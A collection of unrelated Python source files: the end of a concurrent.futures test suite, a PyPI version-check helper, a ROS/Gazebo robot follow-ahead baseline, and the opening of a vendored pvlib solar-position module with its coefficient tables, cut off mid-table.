futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setcheckinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests):
pass
class AsCompletedTests(unittest.TestCase):
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests):
pass
class ExecutorTest(unittest.TestCase):
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(next(i), (0, 1))
self.assertEqual(next(i), (0, 1))
self.assertRaises(ZeroDivisionError, next, i)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 3],
timeout=1.5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaises(ValueError) as cm:
self.executor_type(max_workers=number)
assert str(cm.exception) == "max_workers must be greater than 0"
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertEqual(len(finished), 10)
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(cpu_count() or 1) * 5)
def test_thread_initializer(self):
initialized = []
def initializer(i):
initialized.append(i)
executor = self.executor_type(initializer=initializer, initargs=(1,))
executor.submit(time.sleep, 1)
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
self.assertEqual(initialized, [1, 1])
def test_broken_thread_initializer(self):
def broken_initializer(i):
raise ValueError()
executor = self.executor_type(initializer=broken_initializer)
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1).result()
with self.assertRaises(BrokenExecutor):
executor.submit(time.sleep, 1)
executor.shutdown(wait=True)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
time.sleep(0.001)
executor.submit(mul, 6, 7).result()
time.sleep(0.001)
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest):
pass
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result[0])
def test_done_callback_with_exception(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_with_cancel(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled[0])
def test_done_callback_raises(self):
with captured_stderr() as stderr:
raising_was_called = [False]
raising_old_style_was_called = [False]
fn_was_called = [False]
def raising_fn(callback_future):
raising_was_called[0] = True
raise Exception('doh!')
def raising_old_style_fn(callback_future):
raising_old_style_was_called[0] = True
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
raise OldStyle()
def fn(callback_future):
fn_was_called[0] = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(raising_old_style_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(raising_old_style_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
self.assertIn('OldStyle: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result[0])
def test_done_callback_already_failed(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_already_cancelled(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled[0])
def test_repr(self):
self.assertRegexpMatches(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=pending>')
self.assertRegexpMatches(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+L? state=running>')
self.assertRegexpMatches(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+L? state=cancelled>')
self.assertRegexpMatches(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished raised IOError>')
self.assertRegexpMatches(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+L? state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=IOError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(IOError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependant.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependant.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
IOError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = IOError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), IOError))
def test_old_style_exception(self):
class OldStyle: # Does not inherit from object
def __str__(self):
return 'doh!'
callback_exc_info = [None]
def fn(callback_future):
callback_exc_info[0] = callback_future.exception_info()
f = Future()
f.add_done_callback(fn)
try:
raise OldStyle()
except OldStyle:
want_exc_info = sys.exc_info()
f.set_exception_info(*want_exc_info[1:])
self.assertEqual(f.exception_info(), want_exc_info[1:])
self.assertEqual(callback_exc_info[0], want_exc_info[1:])
try:
f.result()
except OldStyle:
got_exc_info = sys.exc_info()
else:
self.fail('OldStyle exception not raised')
self.assertEqual(got_exc_info[:2], want_exc_info[:2])
got_tb = traceback.extract_tb(got_exc_info[2])
want_tb = traceback.extract_tb(want_exc_info[2])
self.assertEqual(got_tb[-len(want_tb):], want_tb)
@reap_threads
def test_main():
try:
test_support.run_unittest(ProcessPoolExecutorTest,
ThreadPoolExecutorTest,
ProcessPoolWaitTests,
ThreadPoolWaitTests,
ProcessPoolAsCompletedTests,
ThreadPoolAsCompletedTests,
FutureTests,
ProcessPoolShutdownTest,
ThreadPoolShutdownTest)
finally:
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
helper.py
|
import json
import sys
import threading
from packaging.version import Version
from urllib.request import Request, urlopen
import pkg_resources
from rich import print
from rich.panel import Panel
def _version_check(package: str = None, github_repo: str = None):
try:
if not package:
package = vars(sys.modules[__name__])['__package__']
if not github_repo:
github_repo = package
cur_ver = Version(pkg_resources.get_distribution(package).version)
req = Request(
f'https://pypi.python.org/pypi/{package}/json',
headers={'User-Agent': 'Mozilla/5.0'},
)
with urlopen(
req, timeout=1
) as resp: # 'with' is important to close the resource after use
j = json.load(resp)
releases = j.get('releases', {})
latest_release_ver = max(
Version(v) for v in releases.keys() if '.dev' not in v
)
if cur_ver < latest_release_ver:
print(
Panel(
f'You are using [b]{package} {cur_ver}[/b], but [bold green]{latest_release_ver}[/] is available. '
f'You may upgrade it via [b]pip install -U {package}[/b]. [link=https://github.com/jina-ai/{github_repo}/releases]Read Changelog here[/link].',
title=':new: New version available!',
width=50,
)
)
except Exception:
# no network, too slow, PyPi is down
pass
def is_latest_version(package: str = None, github_repo: str = None) -> None:
"""Check if there is a latest version from Pypi, set env `NO_VERSION_CHECK` to disable it.
:param package: package name if none auto-detected
:param github_repo: repo name that contains CHANGELOG if none then the same as package name
"""
threading.Thread(target=_version_check, args=(package, github_repo)).start()
|
base_line.py
|
import time
import random
import os
import cv2 as cv
import logging
import numpy as np
import matplotlib.pyplot as plt
import threading
import math
from squaternion import Quaternion
import argparse
import rospy
from gazebo_msgs.msg import ModelStates
from geometry_msgs.msg import Twist, Point, PoseStamped
from gazebo_msgs.srv import SetModelState
class Robot:
def __init__(self, name):
self.pos = Point()
self.orientation = 0
self.linear_vel = 0
self.angular_vel = 0
self.name = name
def update(self, pos, orientation, linear_vel, angular_vel):
self.pos = pos
self.orientation = orientation
self.linear_vel = linear_vel
self.angular_vel = angular_vel
def calculate_ahead(self, distance):
pos = Point()
pos.x = self.pos.x + math.cos(self.orientation) * distance
pos.y = self.pos.y + math.sin(self.orientation) * distance
return pos
def log_pose(self):
rospy.loginfo("{} position: {} orientation: {} vel(l,a): {}, {}".format(self.name, (self.pos.x, self.pos.y), self.orientation, self.linear_vel, self.angular_vel))
class BaseLine:
def __init__(self):
rospy.init_node('follow_ahead_base_line', anonymous=True)
self.reset = True
self.robot = Robot("robot")
self.person = Robot("person")
self.cmd_vel_pub = rospy.Publisher('/turtlebot1/cmd_vel', Twist, queue_size=10)
self.simple_goal_pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)
self.last_update_goal = rospy.Time.now().to_sec()
rospy.Subscriber("/gazebo/model_states", ModelStates, self.model_states_cb)
x = threading.Thread(target=self.person_tracjetories, args=("person_trajectories",))
def person_tracjetories(self, file_address):
pass
def model_states_cb(self, msg):
for i in range (len(msg.name)):
if msg.name[i] != "person" and msg.name[i] != "robot":
continue
pos = msg.pose[i].position
euler = Quaternion(msg.pose[i].orientation.w, msg.pose[i].orientation.x, msg.pose[i].orientation.y, msg.pose[i].orientation.z).to_euler()
orientation = euler[0]
linear_vel = msg.twist[i].linear.x
angular_vel = msg.twist[i].angular.z
if msg.name[i] == "person":
self.person.update(pos, orientation, linear_vel, angular_vel)
# self.person.log_pose()
now = rospy.Time.now().to_sec()
if (abs(self.last_update_goal - now) > 0.2):
pose_stamped = PoseStamped()
pose_stamped.header.stamp = rospy.Time.now()
pose_stamped.header.frame_id = "odom"
pose_stamped.pose.position = self.person.calculate_ahead(1.5)
pose_stamped.pose.orientation = msg.pose[i].orientation
self.simple_goal_pub.publish(pose_stamped)
self.last_update_goal = rospy.Time.now().to_sec()
rospy.loginfo("publishing ")
elif msg.name[i] == "robot":
self.robot.update(pos, orientation, linear_vel, angular_vel)
# self.robot.log_pose()
if __name__ == '__main__':
#wandb.init(project="followahead_dp")
bl = BaseLine()
# wandb.init(project="followahead_rldp")
parser = argparse.ArgumentParser(description='input weight file of the network')
rospy.spin()
|
spa.py
|
# -*- coding: utf-8 -*-
"""
irradiance.py from pvlib
========================
Stripped down, vendorized version from:
https://github.com/pvlib/pvlib-python/
Calculate the solar position using the NREL SPA algorithm either using
numpy arrays or compiling the code to machine language with numba.
The rational for not including this library as a strict dependency is to avoid
including a dependency on pandas, keeping load time low, and PyPy compatibility
Created by Tony Lorenzo (@alorenzo175), Univ. of Arizona, 2015
For a full list of contributors to this file, see the `pvlib` repository.
The copyright notice (BSD-3 clause) is as follows:
BSD 3-Clause License
Copyright (c) 2013-2018, Sandia National Laboratories and pvlib python
Development Team
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import division
import os
import time
from datetime import datetime
import math
from math import degrees, sin, cos, tan, radians, atan, asin, atan2, sqrt, acos
from fluids.constants import deg2rad, rad2deg
from fluids.numerics import sincos
__all__ = ['julian_day_dt', 'julian_day', 'julian_ephemeris_day', 'julian_century',
'julian_ephemeris_century', 'julian_ephemeris_millennium', 'heliocentric_longitude',
'heliocentric_latitude', 'heliocentric_radius_vector', 'geocentric_longitude',
'geocentric_latitude', 'mean_elongation', 'mean_anomaly_sun', 'mean_anomaly_moon',
'moon_argument_latitude', 'moon_ascending_longitude', 'longitude_nutation',
'obliquity_nutation', 'mean_ecliptic_obliquity', 'true_ecliptic_obliquity',
'aberration_correction', 'apparent_sun_longitude', 'mean_sidereal_time',
'apparent_sidereal_time', 'geocentric_sun_right_ascension', 'geocentric_sun_declination',
'local_hour_angle', 'equatorial_horizontal_parallax', 'uterm', 'xterm', 'yterm',
'parallax_sun_right_ascension', 'topocentric_sun_right_ascension', 'topocentric_sun_declination',
'topocentric_local_hour_angle', 'topocentric_elevation_angle_without_atmosphere',
'atmospheric_refraction_correction', 'topocentric_elevation_angle', 'topocentric_zenith_angle',
'topocentric_astronomers_azimuth', 'topocentric_azimuth_angle', 'sun_mean_longitude',
'equation_of_time', 'calculate_deltat', 'longitude_obliquity_nutation',
'transit_sunrise_sunset',
]
nan = float("nan")
HELIO_RADIUS_TABLE_LIST_0 = [[100013989.0, 0.0, 0.0],
[1670700.0, 3.0984635, 6283.07585],
[13956.0, 3.05525, 12566.1517],
[3084.0, 5.1985, 77713.7715],
[1628.0, 1.1739, 5753.3849],
[1576.0, 2.8469, 7860.4194],
[925.0, 5.453, 11506.77],
[542.0, 4.564, 3930.21],
[472.0, 3.661, 5884.927],
[346.0, 0.964, 5507.553],
[329.0, 5.9, 5223.694],
[307.0, 0.299, 5573.143],
[243.0, 4.273, 11790.629],
[212.0, 5.847, 1577.344],
[186.0, 5.022, 10977.079],
[175.0, 3.012, 18849.228],
[110.0, 5.055, 5486.778],
[98.0, 0.89, 6069.78],
[86.0, 5.69, 15720.84],
[86.0, 1.27, 161000.69],
[65.0, 0.27, 17260.15],
[63.0, 0.92, 529.69],
[57.0, 2.01, 83996.85],
[56.0, 5.24, 71430.7],
[49.0, 3.25, 2544.31],
[47.0, 2.58, 775.52],
[45.0, 5.54, 9437.76],
[43.0, 6.01, 6275.96],
[39.0, 5.36, 4694.0],
[38.0, 2.39, 8827.39],
[37.0, 0.83, 19651.05],
[37.0, 4.9, 12139.55],
[36.0, 1.67, 12036.46],
[35.0, 1.84, 2942.46],
[33.0, 0.24, 7084.9],
[32.0, 0.18, 5088.63],
[32.0, 1.78, 398.15],
[28.0, 1.21, 6286.6],
[28.0, 1.9, 6279.55],
[26.0, 4.59, 10447.39]]
HELIO_RADIUS_TABLE_LIST_1 = [[103019.0, 1.10749, 6283.07585],
[1721.0, 1.0644, 12566.1517],
[702.0, 3.142, 0.0],
[32.0, 1.02, 18849.23],
[31.0, 2.84, 5507.55],
[25.0, 1.32, 5223.69],
[18.0, 1.42, 1577.34],
[10.0, 5.91, 10977.08],
[9.0, 1.42, 6275.96],
[9.0, 0.27, 5486.78],
]
HELIO_RADIUS_TABLE_LIST_2 = [[4359.0, 5.7846, 6283.0758],
[124.0, 5.579, 12566.152],
[12.0, 3.14, 0.0],
[9.0, 3.63, 77713.77],
[6.0, 1.87, 5573.14],
[3.0, 5.47, 18849.23]]
HELIO_RADIUS_TABLE_LIST_3 = [[145.0, 4.273, 6283.076],
[7.0, 3.92, 12566.15]]
HELIO_RADIUS_TABLE_LIST_4 = [[4.0, 2.56, 6283.08]]
NUTATION_YTERM_LIST_0 = [0.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, 0.0, 0.0, -2.0, -2.0, -2.0, 0.0, 2.0, 0.0, 2.0, 0.0, 0.0, -2.0, 0.0, 2.0, 0.0, 0.0, -2.0, 0.0, -2.0, 0.0, 0.0, 2.0, -2.0, 0.0, -2.0, 0.0, 0.0, 2.0, 2.0, 0.0, -2.0, 0.0, 2.0, 2.0, -2.0, -2.0, 2.0, 2.0, 0.0, -2.0, -2.0, 0.0, -2.0, -2.0, 0.0, -1.0, -2.0, 1.0, 0.0, 0.0, -1.0, 0.0, 0.0, 2.0, 0.0, 2.0]
NUTATION_YTERM_LIST_1 = [0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 0.0, 2.0, 1.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0, 1.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, -1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, -1.0, 1.0, -1.0, -1.0, 0.0, -1.0]
NUTATION_YTERM_LIST_2 = [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, 0.0, -1.0, 0.0, 1.0, -1.0, -1.0, 1.0, 2.0, -2.0, 0.0, 2.0, 2.0, 1.0, 0.0, 0.0, -1.0, 0.0, -1.0, 0.0, 0.0, 1.0, 0.0, 2.0, -1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 2.0, 1.0, -2.0, 0.0, 1.0, 0.0, 0.0, 2.0, 2.0, 0.0, 1.0, 1.0, 0.0, 0.0, 1.0, -2.0, 1.0, 1.0, 1.0, -1.0, 3.0, 0.0]
NUTATION_YTERM_LIST_3 = [0.0, 2.0, 2.0, 0.0, 0.0, 0.0, 2.0, 2.0, 2.0, 2.0, 0.0, 2.0, 2.0, 0.0, 0.0, 2.0, 0.0, 2.0, 0.0, 2.0, 2.0, 2.0, 0.0, 2.0, 2.0, 2.0, 2.0, 0.0, 0.0, 2.0, 0.0, 0.0, 0.0, -2.0, 2.0, 2.0, 2.0, 0.0, 2.0, 2.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0, 2.0, 0.0, 2.0, 0.0, 2.0, -2.0, 0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 2.0, 2.0, 2.0, 2.0]
NUTATION_YTERM_LIST_4 = [1.0, 2.0, 2.0, 2.0, 0.0, 0.0, 2.0, 1.0, 2.0, 2.0, 0.0, 1.0, 2.0, 0.0, 1.0, 2.0, 1.0, 1.0, 0.0, 1.0, 2.0, 2.0, 0.0, 2.0, 0.0, 0.0, 1.0, 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 0.0, 1.0, 2.0, 2.0, 0.0, 2.0, 1.0, 0.0, 2.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 0.0, 0.0, 2.0, 2.0, 2.0, 2.0]
NUTATION_ABCD_LIST = [[-171996.0, -174.2, 92025.0, 8.9],
[-13187.0, -1.6, 5736.0, -3.1],
[-2274.0, -0.2, 977.0, -0.5],
[2062.0, 0.2, -895.0, 0.5],
[1426.0, -3.4, 54.0, -0.1],
[712.0, 0.1, -7.0, 0.0],
[-517.0, 1.2, 224.0, -0.6],
[-386.0, -0.4, 200.0, 0.0],
[-301.0, 0.0, 129.0, -0.1],
[217.0, -0.5, -95.0, 0.3],
[-158.0, 0.0, 0.0, 0.0],
[129.0, 0.1, -70.0, 0.0],
[123.0, 0.0, -53.0, 0.0],
[63.0, 0.0, 0.0, 0.0],
[63.0, 0.1, -33.0, 0.0],
[-59.0, 0.0, 26.0, 0.0],
[-58.0, -0.1, 32.0, 0.0],
[-51.0, 0.0, 27.0, 0.0],
[48.0, 0.0, 0.0, 0.0],
[46.0, 0.0, -24.0, 0.0],
[-38.0, 0.0, 16.0, 0.0],
[-31.0, 0.0, 13.0, 0.0],
[29.0, 0.0, 0.0, 0.0],
[29.0, 0.0, -12.0, 0.0],
[26.0, 0.0, 0.0, 0.0],
[-22.0, 0.0, 0.0, 0.0],
[21.0, 0.0, -10.0, 0.0],
[17.0, -0.1, 0.0, 0.0],
[16.0, 0.0, -8.0, 0.0],
[-16.0, 0.1, 7.0, 0.0],
[-15.0, 0.0, 9.0, 0.0],
[-13.0, 0.0, 7.0, 0.0],
[-12.0, 0.0, 6.0, 0.0],
[11.0, 0.0, 0.0, 0.0],
[-10.0, 0.0, 5.0, 0.0],
[-8.0, 0.0, 3.0, 0.0],
[7.0, 0.0, -3.0, 0.0],
[-7.0, 0.0, 0.0, 0.0],
[-7.0, 0.0, 3.0, 0.0],
[-7.0, 0.0, 3.0, 0.0],
[6.0, 0.0, 0.0, 0.0],
[6.0, 0.0, -3.0, 0.0],
[6.0, 0.0, -3.0, 0.0],
[-6.0, 0.0, 3.0, 0.0],
[-6.0, 0.0, 3.0, 0.0],
[5.0, 0.0, 0.0, 0.0],
[-5.0, 0.0, 3.0, 0.0],
[-5.0, 0.0, 3.0, 0.0],
[-5.0, 0.0, 3.0, 0.0],
[4.0, 0.0, 0.0, 0.0],
[4.0, 0.0, 0.0, 0.0],
[4.0, 0.0, 0.0, 0.0],
[-4.0, 0.0, 0.0, 0.0],
[-4.0, 0.0, 0.0, 0.0],
[-4.0, 0.0, 0.0, 0.0],
[3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0],
[-3.0, 0.0, 0.0, 0.0]]
HELIO_LAT_TABLE_LIST_0 = [[280.0, 3.199, 84334.662],
[102.0, 5.422, 5507.553],
[80.0, 3.88, 5223.69],
[44.0, 3.7, 2352.87],
[32.0, 4.0, 1577.34]]
HELIO_LAT_TABLE_LIST_1 = [[9.0, 3.9, 5507.55],
[6.0, 1.73, 5223.69]]
#HELIO_LONG_TABLE_LIST = HELIO_LONG_TABLE.tolist()
HELIO_LONG_TABLE_LIST_0 = [[175347046.0, 0.0, 0.0],
[3341656.0, 4.6692568, 6283.07585],
[34894.0, 4.6261, 12566.1517],
[3497.0, 2.7441, 5753.3849],
[3418.0, 2.8289, 3.5231],
[3136.0, 3.6277, 77713.7715],
[2676.0, 4.4181, 7860.4194],
[2343.0, 6.1352, 3930.2097],
[1324.0, 0.7425, 11506.7698],
[1273.0, 2.0371, 529.691],
[1199.0, 1.1096, 1577.3435],
[990.0, 5.233, 5884.927],
[902.0, 2.045, 26.298],
[857.0, 3.508, 398.149],
[780.0, 1.179, 5223.694],
[753.0, 2.533, 5507.553],
[505.0, 4.583, 18849.228],
[492.0, 4.205, 775.523],
[357.0, 2.92, 0.067],
[317.0, 5.849, 11790.629],
[284.0, 1.899, 796.298],
[271.0, 0.315, 10977.079],
[243.0, 0.345, 5486.778],
[206.0, 4.806, 2544.314],
[205.0, 1.869, 5573.143],
[202.0, 2.458, 6069.777],
[156.0, 0.833, 213.299],
[132.0, 3.411, 2942.463],
[126.0, 1.083, 20.775],
[115.0, 0.645, 0.98],
[103.0, 0.636, 4694.003],
[102.0, 0.976, 15720.839],
[102.0, 4.267, 7.114],
[99.0, 6.21, 2146.17],
[98.0, 0.68, 155.42],
[86.0, 5.98, 161000.69],
[85.0, 1.3, 6275.96],
[85.0, 3.67, 71430.7],
[80.0, 1.81, 17260.15],
[79.0, 3.04, 12036.46],
[75.0, 1.76, 5088.63],
[74.0, 3.5, 3154.69],
[74.0, 4.68, 801.82],
[70.0, 0.83, 9437.76],
[62.0, 3.98, 8827.39],
[61.0, 1.82, 7084.9],
[57.0, 2.78, 6286.6],
[56.0, 4.39, 14143.5],
[56.0, 3.47, 6279.55],
[52.0, 0.19, 12139.55],
[52.0, 1.33, 1748.02],
[51.0, 0.28, 5856.48],
[49.0, 0.49, 1194.45],
[41.0, 5.37, 8429.24],
[41.0, 2.4, 19651.05],
[39.0, 6.17, 10447.39],
[37.0, 6.04, 10213.29],
[37.0, 2.57, 1059.38],
[36.0, 1.71, 2352.87],
[36.0, 1.78, 6812.77],
